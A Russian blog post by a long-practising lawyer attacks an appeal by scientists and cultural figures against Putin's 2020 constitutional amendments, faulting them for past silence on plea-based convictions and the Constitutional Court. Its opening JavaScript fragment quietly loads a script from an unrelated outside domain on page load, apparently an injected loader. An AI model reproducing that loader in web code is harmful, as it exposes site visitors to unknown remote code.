, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

А, где раньше были эти деятели?

16 Мар

Деятели науки и культуры призвали https://www.interfax.ru/russia/699285  не допустить изменения Конституции.

В своём обращении они утверждают https://echo.msk.ru/blog/echomsk/2606224-echo/   : «Вступление в силу поправок, принятых с грубым нарушением определенной Конституцией процедуры, мы вынуждены квалифицировать как разрушение установленного действующей Конституцией правового порядка — как антиконституционный переворот».

При этом они  призывают «предпринять все возможные усилия для возвращения ситуации к законности и конституционному порядку».

Это,  к какому возвращению к законности и конституционному порядку нас призывают, если в стране более 15  лет ежегодно осуждают 500−700 тысяч человек, http://rapsinews.ru/judicial_news/20140211/270688671.html   без исследования и проверки, собранных по делу доказательств, на одних признательных показаниях подсудимых.

Эти осужденные лишены  права обжаловать приговоры, поскольку судьи не исследуют доказательства, положенные в основу приговора.

Вдумайтесь только в то, что обжаловать неправосудный приговор, постановленный в соответствии со ст. 316 УПК РФ нельзя только из-за того, что фактические обстоятельства уголовного дела, суд не проверял (п.1 ст. 389−15 УПК РФ).

Такая правоприменительная практика прямо противоречит ст. 2, 15, 18, 45, 46,ч. 2 ст. 50 Конституции РФ, а также  п. 2 ч. 1 ст. 6 ч. 3 ст. 7, 14, ч. 2 ст. 77 УПК РФ.

Но деятели науки, культуры и юристы молчат.

Ясно, что при таком судопроизводстве не будут исполнены принципы уголовного судопроизводств, а значит, и осуществлена защита личности от незаконного и необоснованного обвинения, осуждения и ограничения её прав и свобод (ст. 6, 14, 17 УПК РФ).

Это прямые доказательства бездействия Путина, как гаранта Конституции.

Но все эти годы лица, подписавшиеся под этим обращением, оставались в числе абсолютного молчаливого большинства.

Кто из  академиков, юристов и журналистов требовал исполнения Путиным обязанностей гаранта Конституции, кто требовал установления в стране власти Конституции, обеспеченной её гарантом и правосудием?

Не о том бузите, господа хорошие.

Высшим непосредственным выражением власти народа является референдум, но это конституционное положение законодатели извратили специальным законом https://rg.ru/2004/06/30/referendum-zakon.html  , который  невозможно применить в данной ситуации.

Но молчали и молчат об этом деятели культуры и науки.

Какой смысл обращаться и к судьям Конституционного суда (КС), приносившим присягу на тексте действующей Конституции.

Мне, как практикующем более 45 лет юристу,  представляется, что предложенные Путиным поправки в Конституцию, касающиеся КС, есть  Божья кара за угодничество.

Судьи КС,  не могли не знать о требованиях статьей  49, 59, 51, 55 Конституции России,   и предписаниях  статей 1, 6, 7, 14, 15, 17, 73, 74,75 части 2 статьи 77, 87, 88 УПК РФ. Они не могли не знать о пыточном судопроизводстве,  которое заставляет обвиняемого брать на себя чужую вину либо признаваться в том, чего фактически обвиняемый не совершал.

Знали, но признали соответствующим Конституции «особый порядок судебного разбирательства», когда приговор выносится только на одном признательном показании обвиняемого, согласившегося с  предъявленным ему обвинением, без исследования и проверки собранных по делу доказательств на относимость, допустимость и достоверность.

Генеральный прокурор Юрий Чайка утверждает, что такое судопроизводство ведёт к деградации https://www.rbc.ru/society/21/02/2018/5a8d75e69a7947394f7b3729      следствия и суда.

С вступлением поправок в силу Конституционный суд утрачивает свои  конституционные полномочия и превращается в  экспертную организацию по правовым вопросам, обслуживающую законодательную и президентскую власть.

Возможно, это из-за того, что КС так и не стал помощником гаранту Конституции в установлении в стране власти  Конституции, обеспеченной её гарантом и правосудием.

Единственным источником власти в России является её многонациональный народ. Именно вступление поправок в силу Путин обусловил тем, как народ проголосует за них.

Как народ решит, так и будет.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.